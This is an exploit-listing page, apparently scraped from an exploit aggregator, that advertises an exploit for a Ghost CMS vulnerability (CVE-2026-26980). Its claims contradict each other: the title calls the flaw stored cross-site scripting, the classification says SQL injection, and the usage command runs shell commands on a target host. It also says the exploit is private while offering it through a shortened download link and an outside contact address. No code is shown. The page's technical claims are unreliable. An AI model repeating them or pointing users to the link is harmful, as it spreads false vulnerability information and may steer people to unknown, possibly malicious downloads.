## https://sploitus.com/exploit?id=41F3CEB8-7817-5671-B254-BCE65753F7F6
# version Unauthenticated Stored Cross-Site Scripting (CVE-2026-26980)
## Overview
A CRITICAL vulnerability, classified as CVE-2026-26980, has been identified, categorized under CWE-89, (CVSS 9.4). Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database.
## Details
- **CVE ID**: [CVE-2026-26980](https://nvd.nist.gov/vuln/detail/CVE-2026-26980)
- **Discovered**: 2026-02-20
- **Published**: 2026-02-20
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.
## Affected Versions
**Ghost Ghost:**
- before 6.19.1
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **security@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/29bl4lvz)